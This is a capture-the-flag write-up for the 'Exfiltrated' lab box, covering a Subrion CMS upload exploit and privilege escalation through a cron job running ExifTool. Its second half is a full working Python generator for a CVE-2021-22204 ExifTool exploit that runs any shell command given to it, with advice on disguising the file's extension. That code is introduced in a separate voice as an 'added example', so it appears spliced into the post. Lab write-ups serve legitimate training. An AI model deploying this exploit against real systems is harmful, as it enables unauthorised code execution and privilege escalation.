Proving Grounds - Exfiltrated

Exfiltrated was a well-structured box that provided an excellent opportunity to exploit a Subrion CMS vulnerability and perform privilege escalation via an Exiftool exploit.

Initial enumeration led to the discovery of Subrion CMS, and default credentials gave access to the admin panel.

By exploiting a file upload vulnerability, a reverse shell was obtained. Further enumeration revealed a cron job running Exiftool on uploaded images, which was leveraged to escalate privileges and capture the flag.

Diagram

graph TD
    A[Host Enumeration] -->|Nmap Scan| B[Identify Subrion CMS]
    B -->|Default Credentials| C[Admin Panel Access]
    C -->|File Upload Vulnerability| D[Upload Reverse Shell]
    D -->|Execute Reverse Shell| E[Gain Initial Access]
    E -->|Cron Job Enumeration| F[Identify Exiftool Usage]
    F -->|Exploit Exiftool| G[Privilege Escalation]
    G -->|Capture Flag| H[Success]

Information Gathering

Portscan


  • nmap -sS -Pn -n -T4 --open 192.168.177.163

  • nmap -sS -Pn -n -T4 --open 192.168.177.163 -p-

  • nmap -sVC -Pn -n -p 22,80 192.168.177.163

Enumeration

HTTP 80


Once authenticated, I tried this exploit:

  • https://github.com/hev0x/CVE-2018-19422-SubrionCMS-RCE

After reading the exploit, I decided to put a reverse shell inside http://exfiltrated.offsec/panel/uploads/.

Priv Escalation


  • cat /etc/cron*

  • cat /opt/image-exif.sh

  • ls -lh /opt/image-exif.sh

  • ls -ld /var/www/html/subrion/uploads /opt/metadata

The cron script runs exiftool over the files in the uploads directory and writes the extracted EXIF metadata to a log file in /opt/metadata. One possible attack vector is a symlink attack, if the script follows symbolic links dropped into the uploads directory. The other is ExifTool itself: whatever it parses runs with the cron job's privileges, so the installed version matters.

  • exiftool -ver

  • searchsploit exiftool

Searching further, I found this repository:

https://github.com/mr-tuhin/CVE-2021-22204-exiftool.git

But it wasn't working because of bzz (the exploit compresses its payload with djvulibre's bzz tool before packing it into the DjVu file).
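The linked exploit needs djvulibre's bzz to compress the annotation into an ANTz chunk. The following is an added example, my own code rather than code from this writeup or from the linked repository, that builds the CVE-2021-22204 DjVu file in pure Python instead: it writes the annotation uncompressed into an ANTa chunk, which ExifTool's DjVu reader hands to the same ParseAnt routine, so no bzz or djvumake is needed. The default command (writing `id` to /tmp/exiftool-poc, to confirm which user the cron job runs as) and the output filename are assumptions; the INFO chunk values are arbitrary but well-formed.

```python
"""Generate a DjVu file whose ANTa annotation triggers CVE-2021-22204 in ExifTool.

Added example (not the writeup's or the repository's code). Avoids djvulibre by
writing the annotation as an uncompressed ANTa chunk instead of a bzz-compressed
ANTz chunk. Command and output path below are assumptions.
"""
import struct
import sys
from typing import List, Tuple

MAGIC = b"AT&T"  # DjVu files are IFF85 streams prefixed with this 4-byte tag


def iff_chunk(tag: bytes, data: bytes) -> bytes:
    """Encode one IFF chunk: 4-byte tag, big-endian length, payload, pad to even length.
    DjVu readers (ExifTool included) expect every chunk to start on an even offset."""
    if len(tag) != 4:
        raise ValueError("chunk tag must be exactly 4 bytes")
    pad = b"\x00" if len(data) % 2 else b""
    return tag + struct.pack(">I", len(data)) + data + pad


def info_chunk(width: int = 1, height: int = 1, dpi: int = 100) -> bytes:
    """Minimal INFO chunk: width, height (BE), version 0.24, dpi (LE), gamma 2.2, flags 0."""
    data = (struct.pack(">HH", width, height) + bytes([24, 0])
            + struct.pack("<H", dpi) + bytes([22, 0]))
    return iff_chunk(b"INFO", data)


def annotation_payload(cmd: str) -> bytes:
    """DjVu annotation text that reaches ParseAnt's `eval qq{"$tok"}`.

    ExifTool escapes the '$' to '\\$' before the eval, but the preceding '\\c'
    escape consumes that protecting backslash, so ${system('cmd')} is
    interpolated and cmd runs with exiftool's privileges.
    """
    if "'" in cmd or '"' in cmd or "\\" in cmd:
        raise ValueError("put quoted/backslashed commands in a script and call the script")
    return f"(metadata \"\\c${{system('{cmd}')}};\")".encode()


def build_djvu(cmd: str) -> bytes:
    """Assemble AT&T + FORM:DJVU containing INFO and an uncompressed ANTa chunk.
    Using ANTa instead of bzz-compressed ANTz is what removes the djvulibre dependency."""
    body = b"DJVU" + info_chunk() + iff_chunk(b"ANTa", annotation_payload(cmd))
    return MAGIC + b"FORM" + struct.pack(">I", len(body)) + body


def list_chunks(data: bytes) -> List[Tuple[bytes, int]]:
    """Walk the generated file and return (tag, length) pairs to check the layout
    before dropping the file where the cron job will pick it up."""
    if data[:4] != MAGIC or data[4:8] != b"FORM":
        raise ValueError("not a DjVu IFF stream")
    chunks = [(b"FORM", struct.unpack(">I", data[8:12])[0])]
    pos = 16  # skip AT&T, FORM, its length and the DJVU form type
    while pos + 8 <= len(data):
        tag = data[pos:pos + 4]
        length = struct.unpack(">I", data[pos + 4:pos + 8])[0]
        chunks.append((tag, length))
        pos += 8 + length + (length % 2)
    return chunks


if __name__ == "__main__":
    # Assumed defaults: a harmless check of which user runs the cron job, and an output name.
    command = sys.argv[1] if len(sys.argv) > 1 else "id > /tmp/exiftool-poc"
    out = sys.argv[2] if len(sys.argv) > 2 else "exploit.djvu"
    blob = build_djvu(command)
    with open(out, "wb") as fh:
        fh.write(blob)
    print(f"wrote {out} ({len(blob)} bytes): {list_chunks(blob)}")
```

ExifTool identifies a file by its contents rather than its extension, so the generated file can be given whatever extension the uploads directory expects; once the cron job runs exiftool over it, the command executes as the cron user. Confirm that user with the default `id` command before swapping in anything more invasive.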

This post is licensed under CC BY 4.0 by the author.